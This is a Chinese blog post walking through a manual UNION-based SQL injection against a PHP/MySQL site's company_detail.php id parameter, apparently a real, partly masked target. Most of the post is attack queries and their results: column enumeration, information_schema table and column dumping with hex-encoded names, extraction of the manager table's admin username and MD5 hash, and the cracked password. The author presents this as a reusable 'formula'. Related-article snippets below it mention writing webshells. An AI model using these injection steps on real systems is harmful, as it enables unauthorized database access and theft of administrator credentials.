php手工注入拿后台

最新推荐文章于 2023-03-06 23:50:17 发布
最新推荐文章于 2023-03-06 23:50:17 发布
阅读量786 收藏 3
点赞数
分类专栏: sql注入 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/three_fish/article/details/47136937
版权

http://www.XXXXX.com.cn/company_detail.php?id=16 

and 1=1 看一下 正常

and 1=2 错误

order by 8 正常

order by 9 错误 说明就是8

UNION SELECT 1,2,3,4,5,6,7,8      8个   出现数字 2 与 6


version()获取版本
database()获取数据库名
user()获取当前用户
@@version_compile_os 获取操作系统信息

先获取版本信息
http://www.XXXXX.com.cn/company_detail.php?id=16  UNION SELECT 1,2,3,4,5,version(),7,8
就是(注入点 UNION SELECT version())注意version()是插在显位数字那里的。

5.1.33-community   大于5.0 可以用这种方法注入

UNION SELECT 1,2,3,4,5,database(),7,8

UNION SELECT 1,2,3,4,5,user(),7,8

UNION SELECT 1,2,3,4,5,@@version_compile_os,7,8

最终得到 


version()  5.1.33-community 
database()  sq_*****
user() *****@localhost
@@version_compile_os  Win32


【然后下面就是重点了,这个东西是死的,大家只要记住就可以。我留个公式下来:】
-------------------------------------------嘿嘿,在吗----------------------------------------------------


获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)
获取表段和字段:
注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名)
获取指定表下的指定字段信息
注入点 UNION SELECT 1,字段名 from 表名

注意数字 1,2,3,4,5,6,7,8  这里给的是1,2 是不对的

-------------------------------------------在啊,有事吗----------------------------------------------------


首先来获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)

hex编码

http://www.107000.com/T-Hex/   将得到的结果前面加上 0x


我这里是 0x73715f****6a7873   则为 

UNION SELECT 1,2,3,4,5,table_name,7,8 from information_schema.tables where table_schema=0x73715f****6a7873

看上面的语句会发现information_schema.tables 为什么要写这串英文呢?因为版本大于5.0的话有个自带的表,就是它     所有如果小于5.0就么有这张表 注入语句也不会这么写。

得到 ***config  没有全部爆出来

(如果没有全部爆出来,我们只需要把table_name用英文括号括起来,前面加个group_concat 再次访问,就可以获取到所有表)

UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=0x73715f****6a7873

得到 全部表 包括 manager  一看就知道是这个

编码 manager  得0x6d616e6167657220

UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x6d616e6167657220

结果不是  因为 用这个返回正常的页面

得到 MName MPsw


此时的语句就简单多了:
获取指定表下的指定字段信息
注入点 UNION SELECT 1,2,3,4,5,字段名,7,8 from 表名

即 UNION SELECT 1,2,3,4,5,concat(0x3a,MName,0x3a,MPsw),7,8 from manager

得到     :xyc:99D75B460B05C7D660D7069A0A4D4B4B

即用户名xyc 密码的密文为99D75B460B05C7D660D7069A0A4D4B4B    MD5解密得  7238809













盗才生
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP、mysql(手工注入
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
php手工注入语句,PHP+MySQL 手工注入语句大全
weixin_42138716的博客
03-10 247
PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5……n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站...
PHP代码注入PHP代码注入漏洞
cc
03-06 5920
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1641
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本中,我们可以对输入进行注入攻击。什么是注入注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
php注入后台,用SQL注入漏洞登录后台
weixin_29207533的博客
03-23 508
在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。现在,很多网站开发人员知其然而不知其所以然,小弟也是,所以赶紧恶补下,总结如学习内容。希望对初学者能够起到抛砖引玉的作用。一、SQL注入的步骤a) 寻找注入点(如:登录界面、留言板等)b)...
php手工注入 --,PHP手工注入初探
weixin_39616222的博客
04-04 95
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-------------------------...
sql注入自学指南
06-27
大概目录: sql注入原理 手工注入php+mysql参数与技巧 后台安全(万能密码) php+mysql注入查表(字段)语句 ... 等等共25章
YouDianCMS-PHP
06-25
系统后台可以设置伪静态、设置HTML静态缓存策略、搜索引擎优化设置、常用搜索引擎登录入口、生成网站地图、生成关键词内链、百度自动推送5、可以DIY装修模板:可视化编辑,所见即所得!可DIY装修模板,高级装修组件...
PHPCMS网站系统源码官方版 v9.3.4
04-02
PHPCMS V9采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次...二、下载升级包按顺序手工升级
PHPCMS网站系统最新官方版
04-03
PHPCMS网站系统,该系统PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。...二、下载升级包按顺序手工升级 1、请先对原有文件进行备份。 2、上传upload中的文件到网站根目录,覆盖原有文件。
PHP手工注入经典教程
12-12
特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。
后台被入侵了解决详情
weixin_67757219的博客
02-02 377
首先我们来确认下客户的服务器,使用的是linux centos系统,网站采用的PHP语言开发,数据库类型是mysql,使用开源的thinkphp架构二次开发而成,服务器配置是16核,32G内存,带宽100M独享,使用的是阿里云ECS服务器,在被黑客攻击之前,收到过阿里云的短信,提示服务器在异地登录,我们小蚁安全技术跟客户对接了阿里云的账号密码以及服务器的IP,SSH端口,root账号密码。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。
入侵php网站后台管理系统,caozha-admin(PHP网站后台管理框架)
weixin_31632707的博客
04-06 1001
caozha-admin是一个通用的PHP网站后台管理框架,基于开源的ThinkPHP开发,特点:易上手,零门槛,界面清爽极简,极便于二次开发。基础功能1、系统设置2、管理员管理3、权限组管理4、系统日志5、后台功能地图6、整合了百度UEditor等各种常用插件,可去演示页面查看调用。7、无限级别分类8、文章管理系统9、用户(会员)管理系统10、评论系统(支持盖楼评论,支持设置屏蔽词、验证码、是否...
一个PHP+Mysql手工注入例子
Praifire的博客
07-16 1万+
说下我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell 4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马 不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。 下面具体来说明下
手工注入基本思路
weixin_30596023的博客
05-09 178
手工注入 说下我的基本思路:1、目标站点环境为:Windows+Apache+Mysql+PHP2、存在SQL注入,能否直接写一句话木马3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。下面具体来说明下:1、尝试1=1...
PHP手工注入初探
冰点的博客
08-18 109
注:为了网站的安全,对网址做了处理 ***目标:http://www.lawxxxxxxx.com.cn 注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377 http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那...
PHP+MySQL实现简单的登录(SQL注入入门实验)
热门推荐
江左盟的博客
06-03 1万+
本实验是入门级的SQL注入实验,手工注入吧,用sqlmap就没意思了,简单过程:用户输入用户和密码然后提交,服务端收到用户和密码并查询数据库输出到页面。 一、创建数据库 create database web1; 创建两张表,一张保存登录用户和密码,另一张保存flag: create table test(user varchar(15),password varchar(16)); c...
起点小说解锁.js
最新发布
04-27
起点小说解锁.js
php csm 后台皮肤
12-17
PHP CSM后台皮肤是指在使用PHP语言开发的内容管理系统(CMS)中,后台管理界面的外观皮肤。通过更换后台皮肤,可以改变后台管理界面的整体风格和布局,从而提升用户体验和界面美观度。 PHP CSM后台皮肤的设计通常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值